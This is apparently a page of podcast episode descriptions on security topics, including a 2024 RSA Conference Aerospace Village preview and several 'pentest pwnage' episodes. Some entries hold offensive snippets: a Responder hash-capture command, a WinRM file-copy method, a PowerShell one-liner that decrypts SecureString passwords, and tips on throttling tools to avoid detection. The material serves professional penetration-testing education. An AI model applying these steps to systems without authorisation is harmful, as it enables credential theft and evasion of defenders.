Guests: Henry Danielson, Volunteer at AeroSpace Village [@SecureAerospace]On LinkedIn | https://www.linkedin.com/in/henry-danielson-43a61213/On Twitter | https://twitter.com/hdanielsonLiz Wharton, Founder, Silver Key Strategies [@silverkeystrat]On LinkedIn | https://www.linkedin.com/in/elizabeth-wharton/On Mastodon | https://infosec.exchange/@LawyerLizOn Twitter | https://twitter.com/LawyerLiz____________________________Hosts: Sean Martin, Co-Founder at ITSPmagazine [@ITSPmagazine] and Host of Redefining CyberSecurity Podcast [@RedefiningCyber]On ITSPmagazine | https://www.itspmagazine.com/sean-martinMarco Ciappelli, Co-Founder at ITSPmagazine [@ITSPmagazine] and Host of Redefining Society PodcastOn ITSPmagazine | https://www.itspmagazine.com/itspmagazine-podcast-radio-hosts/marco-ciappelli____________________________Episode NotesThe Aerospace Village at the RSA Conference 2024 is gearing up to be an event filled with innovation, collaboration, and excitement. In a recent episode of "Chats on the Road to RSA Conference 2024" with Sean Martin and Marco Ciappelli, the hosts digs into the details of what attendees can expect at the Aerospace Village. Let's take a closer look at the insights shared during this engaging discussion.Unveiling the Aerospace Village Experience:The podcast episode kicks off with Marco Ciappelli welcoming listeners to the conversation alongside guests Henry Danielson and Liz Wharton. The trio's palpable enthusiasm sets the stage for a deep dive into the diverse offerings of the Aerospace Village at RSA Conference 2024.Innovative Initiatives and Collaborations:Henry Danielson shares exclusive details about the Aerospace Village's collaboration with BuddhaBot to introduce a unique badge experience focused on constellations. The hands-on challenges and engaging activities promise an immersive experience for attendees, emphasizing learning through interactive participation.Exciting Activities and Exhibits:The conversation unfolds with discussions on Pentest partners' flight simulator and the AMSAT project, showcasing opportunities for visitors to explore CubeSat technology and ground control stations. The Space Grand Challenge, aimed at educating young minds in the cybersecurity realm, further highlights the village's commitment to fostering innovation and knowledge sharing.Insightful Industry Conversations:Liz Wharton sheds light on the importance of vulnerability disclosures in the aerospace industry and emphasizes the significance of building robust security practices collaboratively. The dialogue underscores the village's role in fostering critical conversations around cybersecurity, aviation, and space exploration.Community Engagement and Visionary Leadership:Hosts and Guests express their excitement for the upcoming RSA Conference and encourage attendees to join the vibrant community at the Aerospace Village. From showcasing cutting-edge technologies to facilitating thought-provoking discussions, the village promises to be a hub of inspiration and knowledge exchange.As the episode concludes, the hosts extend a warm invitation to all enthusiasts, innovators, and industry professionals to participate in the vibrant experience awaiting them at the Aerospace Village during RSA Conference 2024. The blend of education, engagement, and collaboration sets the stage for an unforgettable event that promises to shape the future of aerospace and cybersecurity industries.Stay tuned for more updates and insights as we venture into the dynamic world of Aerospace Village at RSA Conference 2024!Be sure to follow our Coverage Journey and subscribe to our podcasts!____________________________Follow our RSA Conference USA 2024 coverage: https://www.itspmagazine.com/rsa-conference-usa-2024-rsac-san-francisco-usa-cybersecurity-event-infosec-conference-coverageOn YouTube:
Hey friends, today we've got a tale of pentest pwnage that covers: Passwords – make sure to look for patterns such as keyboard walks, as well as people who are picking passwords where the month the password changed is part of the password (say that five times fast)! Making sure you go after cached credentials Attacking SCCM – Misconfiguration Manager is an absolute gem to read, and The First Cred is the Deepest – Part 2 with Gabriel Prud'homme is an absolute gem to see. Also, check out sccmhunter for all your SCCM pwnage needs.
Hey friends, sorry I'm so late with this (er, last) week's episode but I'm back! Today is more of a prep for tales of pentest pwnage, but topics covered include: Make sure when you're snafflin‘ that you check for encrypted/obfuscated logins and login strings – it might not be too tough to decrypt them! On the defensive side, I've found myself getting *blocked* doing things like SharpHound runs, Snaffler, PowerHuntShares, etc. Look through the readme files for these tools and try cranking down the intensity/threads of these tools and you might fly under the radar.
Today's tale of pentest covers: Farming for credentials (don't forget to understand trusted zones to make this happen properly!) Snaffling for juice file shares Stealing Kerberos tickets with Rubeus
Hey friends, today we cover a funstrating (that's fun + frustrating) issue we had with our DIY pentest dropboxes. TLDL: The preseed file got jacked because I had a bad Kali metapackage in it. While I was tinkering around with preseed files, I decided it would be more efficient to have the Kali ISO call that preseed file directly over HTTP (rather than make a new ISO every time I made a preseed change). To accomplish that: Mount the Kali ISO Explore to isolinux > txt.cfg Modify the txt.cfg to include a custom boot option that calls your preseed over HTTP. For example: label install menu label ^Install Yermaum kernel /install.amd/vmlinuz append net.ifnames=0 preseed/url=https://somewebsite/kali.preseed locale=en_US keymap=us hostname=kali777 domain=7min.sec simple-cdd/profiles=kali desktop=xfce vga=788 initrd=/install.amd/initrd.gz --- quiet
Let's hack cybersecurity in 2024 with Melanie Rieback, Co-founder & CEO of Radically Open Security, the world's first not-for-profit cybersecurity consultancy with a focus on PenTesting
Today we're talking about how you can use PatchMyPc to keep your home PC and/or pentest dropbox automatically updated with the latest/greatest patches!
Today we talk about an awesome path to internal network pentest pwnage using downgraded authentication from a domain controller, a tool called ntlmv1-multi, and a boatload of cloud-cracking power on the cheap from vast.ai. Here's my chicken scratch notes for how to take the downgraded authentication hash capture (using Responder.py -I eth0 --lm) and eventually tweeze out the NTLM hash of the domain controller (see https://7ms.us for full show notes).
In today's tale of pentest pwnage we talk about: The importance of local admin and how access to even one server might mean instant, full control over their backup or virtualization infrastructure Copying files via WinRM when copying over SMB is blocked: $sess = New-PSSession -Computername SERVER-I-HAVE-LOCAL-ADMIN-ACCESS-ON -Credential * ...then provide your creds...and then: copy-item c:superimportantfile.doc -destination c:my-local-hard-drivesuperimportantfile.doc -fromsession $sess If you come across PowerShell code that crafts a secure string credential, you may able to decrypt the password variable with: [System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($MyVarIWantToDecryptGoesHere))
Cloud Security Pentest is not just a Cloud configuration review ! Blackhat 2023 & Defcon 31 conversations included Cloud Security Podcast asking traditional and experienced pentesters about their opinion on cloud security pentesting and the divide was between it being a config review or a product pentest. For this episode we have Seth Art from Bishop Fox to clarify the myth. Episode YouTube: Video Link Host Twitter: Ashish Rajan (@hashishrajan) Guest Socials: Seth Art's Linkedin (Seth Art Linkedin) Podcast Twitter - @CloudSecPod If you want to watch videos of this LIVE STREAMED episode and past episodes - Check out our other Cloud Security Social Channels: - Cloud Security Newsletter - Cloud Security BootCamp Spotify TimeStamp for Interview Question (00:00) Introduction (05:17) A bit about Seth Art (06:44) Network vs Infrastructure Security Pentest (08:00) Internal vs External Network Security Pentest (10:26) Assumed vs Objective Based Pentest (12:51) Is network pentest dead? (14:04) How to approach network and cloud pentests? (20:12) Cloud pentest is more than config review (24:04) Examples of cloud pentest findings (30:07) Scaling pentests in cloud (32:25) Traditional skillsets to cloud pentest (36:58) A bit about cloudfoxable (39:31) Cloud pentest and Zero Trust (40:54) Staying ahead of CSP releases (44:31) Third party shared responsibility (47:35) 1 fun question (48:36) Boundary for cloud pentest (52:21) Last 2 fun questions These are some of the resources that Seth shared during the episode along with the tools he has created CloudFox CloudFoxable flAWS flAWS 2 iamvulnerable Cloud Goat See you at the next episode!